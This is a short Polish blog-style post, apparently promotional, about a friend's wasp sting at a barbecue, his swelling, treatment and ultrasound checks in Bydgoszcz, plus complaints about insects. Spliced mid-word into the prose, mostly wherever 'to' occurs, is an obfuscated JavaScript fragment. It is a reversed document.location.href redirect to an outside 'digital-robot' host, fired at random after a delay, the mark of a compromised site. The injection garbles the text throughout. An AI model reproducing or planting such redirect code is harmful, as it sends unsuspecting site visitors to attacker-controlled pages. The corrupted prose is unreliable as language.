osa

Użądlenie osy a usg

Siedzieliśmy na grillu ze znajomymi. Było latobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, piliśmy słodkie napoje. Owadów w tym roku było pełno, i taki pech się stał, że kolegę użądliła osa Był na nie uczulony i w momencie spuchł przeraźliwie.

Usg – czy aby nic nie jest uszkodzone

osaCała jego twarz wyglądała, jakby nie udał mu się botobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toks i wyglądał przeraźliwie. Zawieźliśmy go na pogotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towie. Pomogła mu medycyna estetyczna, trochę trzeba było go naprawić. Sprawdzono na usg wykonywane przez fachowców w Bydgoszczy, czy nic sobie nie uszkodził, i czy wszystko jest w porządku. Dostał jakieś zastrzyki i na razie jest dobrze. Jak taka mała głupia osa, może tak namieszać. Do tego zepsuła nam spokojne popołudnie. Mogliby rozprowadzić jakieś spraye na owady, aby Bydgoszcz była od nich wolna. Ostatnio nawet z psem byłem u weterynarza, bo został użądlony przez szerszenia. A o liczbie komarów nie wspomnę. Chodzimy i się drapiemy cały czas. Na ten stan wpływa fakt, że na podwórzu mamy staw. A owady uwielbiają wodę i lgną do niej jak pszczoły do miodu. Latają tylko i uprzykrzają człowiekowi życie. Chodzę cały śmierdzący, bo zawsze nakładam pełno specyfików na te paskudztwa. Wolę tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, niż cały czas się drapać. Wracając do znajomego, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to wszystko z nim już w porządku, opuchlizna powoli schodzi. Natobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomiast boi się już teraz do nas przychodzić. Musimy spotykać się u niego w mieszkaniu.

Biedny, ma teraz awersję do wolnych przestrzeni. No ale nie dziwię się mu, sam nie chciałbym spędzać dnia na pogotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towiu ze spuchniętą twarzą. Następnym razem spotkamy się u nas na jesień, kiedy już nie będzie na szczęście żadnych szkodliwych stworów.